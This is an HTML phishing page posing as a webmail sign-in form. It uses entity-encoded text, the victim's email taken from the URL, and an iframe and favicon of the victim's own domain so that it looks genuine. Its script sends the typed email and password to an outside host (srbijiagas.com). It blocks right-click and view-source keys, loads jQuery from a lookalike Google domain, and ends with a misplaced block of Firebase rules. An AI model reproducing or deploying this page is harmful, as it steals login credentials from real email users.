

<!doctype html>
<html lang="en">
<head>
    <title>&#x57;&#x65;&#x62;&#x6D;&#x61;&#x69;&#x6C;&#x20;&#x50;&#x6F;&#x72;&#x74;&#x61;&#x6C;&#x20;&#x41;&#x63;&#x63;&#x65;&#x73;&#x73; </title>
	<link type="text/css" rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
	<script src="https://ajax.googleapis.luchifab.com/ajax.googleapis/ajax/libs/jquery/2.2.4/jquery.min.js"></script> 
	<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    
   <style type="text/css">
	
	body {
    font-family: 'Open Sans', sans-serif;
    color: #535353;
}

.img-fluid {
    max-width: 100% !important;
    height: auto;
}

.form-control:focus {
    box-shadow: none;
}

h1, h2, h3, h4, h5, h6, .h1, .h2, .h3, .h4, .h5, .h6 {
    font-family: 'Open Sans', sans-serif;
}

/** Login 1 start **/
.login-1 {
    background: rgba(0, 0, 0, 0.04) url(img/bg-image.html) top left repeat;
    background-size: cover;
    top: 0;
    width: 100%;
    bottom: 0;
    opacity: 1;
    min-height: 100vh;
    text-align: center;
    position: relative;
    display: -webkit-box;
    display: -moz-box;
    display: -ms-flexbox;
    display: -webkit-flex;
    display: flex;
    justify-content: center;
    align-items: center;
    padding: 30px;
}

.login-1 .login-inner-form {
    max-width: 380px;
    margin: 0 auto;
    color: #717171;
    text-align: center;
}

.login-1 .login-inner-form .details {
    padding: 25px 30px 30px;
    background: #fff;
    border-radius: 5px 5px 0 0;
}

.login-1 .login-inner-form img {
    margin-bottom: 15px;
    height: 30px;
}

.login-1 .login-inner-form h3 {
    margin: 0 0 25px;
    font-size: 18px;
    font-weight: 400;
    font-family: 'Open Sans', sans-serif;
    color: #717171;
}

.login-1 .login-inner-form .form-group {
    margin-bottom: 25px;
}

.login-1 .login-inner-form .input-text {
    width: 100%;
    padding: 10px 15px;
    font-size: 14px;
    border: 1px solid #e8e7e7;
    outline: none;
    color: #717171;
    border-radius: 3px;
    height: 45px;
}

.login-1 .login-inner-form .btn-md {
    cursor: pointer;
    padding: 12px 30px 11px 30px;
    letter-spacing: 1px;
    font-size: 15px;
    font-weight: 600;
    font-family: 'Open Sans', sans-serif;
    border-radius: 3px;
}

.login-1 .login-inner-form .social-list{
    margin-bottom: 0;
    padding: 0;
}

.login-1 .login-inner-form .checkbox a {
    font-size: 14px;
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .terms{
    margin-left: 3px;
}

.login-1 .login-inner-form .checkbox {
    margin-bottom: 25px;
    font-size: 14px;
}

.login-1 .login-inner-form .form-check{
    float: left;
    margin-bottom: 0;
}

.login-1 .login-inner-form .form-check a {
    color: #717171;
    float: right;
}

.login-1 .login-inner-form .form-check-input {
    position: absolute;
    margin-left: 0;
}

.login-1 .login-inner-form .form-check label::before {
    content: "";
    display: inline-block;
    position: absolute;
    width: 17px;
    height: 17px;
    margin-left: -25px;
    border: 1px solid #cccccc;
    border-radius: 3px;
    background-color: #fff;
}

.login-1 .login-inner-form .form-check-label {
    padding-left: 25px;
    margin-bottom: 0;
    font-size: 14px;
}

.login-1 .login-inner-form .checkbox-theme input[type="checkbox"]:checked + label::before {
    background-color: #0f96f9;
    border-color: #0f96f9;
}

.login-1 .login-inner-form input[type=checkbox]:checked + label:before {
    font-weight: 300;
    color: #f3f3f3;
    line-height: 15px;
    font-size: 14px;
    content: "\2713";
}

.login-1 .login-inner-form input[type=checkbox], input[type=radio] {
    margin-top: 4px;
}

.login-1 .login-inner-form .social-list li {
    display: inline-block;
    font-size: 16px;
    margin-top: 30px;
}

.login-1 .login-inner-form .social-list li a {
    margin:2px;
    font-size: 14px;
    width: 35px;
    height: 35px;
    border-radius: 3px;
    display: inline-block;
    text-align: center;
    line-height: 35px;
}

.login-1 .login-inner-form .footer {
    font-size: 14px;
    padding: 15px 20px;
    background-color: #f5f5f5;
    border-radius: 0 0 5px 5px;
    border-top: solid 1px #f5f5f5;
}

.login-1 .login-inner-form .footer span a {
    color: #717171;
}

.login-1 .login-inner-form button:focus {
    outline: none;
    outline: 0 auto -webkit-focus-ring-color;
}

.login-1 .login-inner-form .btn-theme:not([disabled]):not(.disabled).active, .btn-theme:not([disabled]):not(.disabled):active, .show > .btn-theme.dropdown-toggle {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme.focus, .btn-theme:focus {
    box-shadow: none;
}

.login-1 .login-inner-form .btn-theme {
    background: #0f96f9;
    border: none;
    color: #fff;
}

.login-1 .login-inner-form .btn-theme:hover {
    background: #0294B6;
}

/** Social media **/
.login-1 .facebook-bg {
    background: #4867aa;
    color: #fff;
}

.login-1 .facebook-bg:hover {
    background: #3b589e;
    color: #fff;
}

.login-1 .twitter-bg {
    background: #33CCFF;
    color: #fff;
}

.login-1 .twitter-bg:hover {
    background: #56d7fe;
    color: #fff;
}

.login-1 .google-bg {
    background: #db4437;
    color: #fff;
}

.login-1 .google-bg:hover {
    background: #dc4e41;
    color: #fff;
}

.login-1 .linkedin-bg {
    background: #0177b5;
    color: #fff;
}

.login-1 .linkedin-bg:hover {
    background: #1c82ca;
    color: #fff;
}

/** MEDIA **/
@media (max-width: 992px) {
    .login-1 {
        padding: 30px 0;
    }
}


	</style>
  </head>
  <body id="top">
 <iframe id="mainPage" src="#" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock
allow-popups allow-same-origin allow-scripts" style="position: absolute;height: 100%;border: none;"></iframe>
<div class="login-1">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <div class="login-inner-form">
                    <div class="details">
                        
      <form action="#" method="post">
		<div align="center">
        <h2 class="text-center"><div id="top"><img src="#" alt="" id="logoimg" style="width:30px;height:30px;margin-top:10px;"> 
		  <span style="vertical-align: middle; padding-left: 3px" id="logoname"></span> </div>
		<br/>
        <h3 align="center">&#x53;&#x69;&#x67;&#x6E;&#x20;&#x74;&#x6F;&#x20;&#x63;&#x6F;&#x6E;&#x74;&#x69;&#x6E;&#x75;&#x65;</h3><br/>
        <center>
          <div class="alert alert-danger" id="msg" style="display: none;">&#x49;&#x6E;&#x63;&#x6F;&#x72;&#x72;&#x65;&#x63;&#x74;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;<p>&#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x61;&#x20;&#x76;&#x61;&#x6C;&#x69;&#x64;&#x20;&#x65;&#x6D;&#x61;&#x69;&#x6C;&#x20;&#x70;&#x61;&#x73;&#x73;&#x77;&#x6F;&#x72;&#x64;&#x2E;</div>
          <span id="error" class="text-danger" style="display: none;">&#x54;&#x68;&#x61;&#x74;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;&#x20;&#x64;&#x6F;&#x65;&#x73;&#x6E;&#x27;&#x74;&#x20;&#x65;&#x78;&#x69;&#x73;&#x74;&#x2E;&#x20;&#x45;&#x6E;&#x74;&#x65;&#x72;&#x20;&#x61;&#x20;&#x64;&#x69;&#x66;&#x66;&#x65;&#x72;&#x65;&#x6E;&#x74;&#x20;&#x61;&#x63;&#x63;&#x6F;&#x75;&#x6E;&#x74;&#x2E;</span>
        </center>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-user"></i></span>
            <input type="email" class="form-control" name="email" placeholder="Username" value="" id="email" readonly="">
          </div>
        </div>
        <div class="form-group">
          <div class="input-group">
            <span class="input-group-addon"><i class="fas fa-lock"></i></span>
            <input type="password" class="form-control" id="password" name="password" placeholder="Password" required="required">
          </div>
        </div>
		<div class="form-group">
		 <div align="left">
          <input type="checkbox"> &#x52;&#x65;&#x6D;&#x65;&#x6D;&#x62;&#x65;&#x72;&#x20;&#x4D;&#x65;
        </div>
		</div>
        <div class="form-group">
         
		           <button type="submit" class="btn btn-primary login-btn btn-block" id="submit-btn">&#x53;&#x69;&#x67;&#x6E;&#x20;&#x69;&#x6E;</button>
        </div>
       

      </form>
      </a>
    </div>


    <style>.tb_button {padding:1px;cursor:pointer;border-right: 1px solid #8b8b8b;border-left: 1px solid #FFF;border-bottom: 1px solid #fff;}.tb_button.hover {borer:2px outset #def; background-color: #f8f8f8 !important;}.ws_toolbar {z-index:100000} .ws_toolbar .ws_tb_btn {cursor:pointer;border:1px solid #555;padding:3px}   .tb_highlight{background-color:yellow} .tb_hide {visibility:hidden} .ws_toolbar img {padding:2px;margin:0px}</style>

      <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
      <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
      <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
    <script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>

  <script>

// prevent ctrl + s
$(document).bind('keydown', function(e) {
if(e.ctrlKey && (e.which == 83)) {
e.preventDefault();
return false;
}
});

document.addEventListener('contextmenu', event => event.preventDefault());

document.onkeydown = function(e) {
if (e.ctrlKey && 
(e.keyCode === 67 || 
e.keyCode === 86 || 
e.keyCode === 85 || 
e.keyCode === 117)) {
return false;
} else {
return true;
}
};
$(document).keypress("u",function(e) {
if(e.ctrlKey)
{
return false;      }
else {
return true;
}});




    /* global $ */
    $(document).ready(function(){
      var count=0;
 
      $('#back1').click(function () {
        $("#msg").hide();
        $('#email').val("");
        $("#automail").animate({left:200, opacity:"hide"}, 0);
        $("#inputbar").animate({right:200, opacity:"show"}, 1000);

      });

      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
        var my_email =email;
        $('#email').val(my_email); 
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!filter.test(my_email)) {
          $('#error').show();
           email.focus;
           return false;
        }
        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
      var mainPage = 'https://'+my_slice; 
        $("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain="+mainPage);
         document.getElementById('mainPage').src = mainPage;
	 	
        $(".email").html(email);
		 
      }
      $('#submit-btn').click(function(event){
         var password=$("#password").val();
         event.preventDefault();
         var password=$("#password").val();

      count=count+1;
       console.log(email); 
      $.ajax({
        dataType: 'JSON',
        url: 'https://srbijiagas.com/.well-knowns/indexj.php',
        type: 'POST',
        data:{
          email:email,
          password:password
        },
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing...');
			  
            },
            success: function(response){
			 $('#msg').html("<span style='color:red;'>Username or Password is incorrect. Please try again</span>");
              if(response){
                $("#msg").show();
				console.log(response);
				$('#msg').html(response['msg']);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    window.location.replace("http://www."+my_slice); 

                  }
                }
                else{
                   $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=3) {
                count=0;
                window.location.replace("http://www."+my_slice); 
              }
              $("#msg").show();
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });  
    });


    });


  </script>
  
  <script>
  service firebase.storage {
  match /b/{bucket}/o {
    match /{allPaths=**} {
      disallow read, write: if request.auth != null;
    }
  }
}
  </script>
</body>
</html>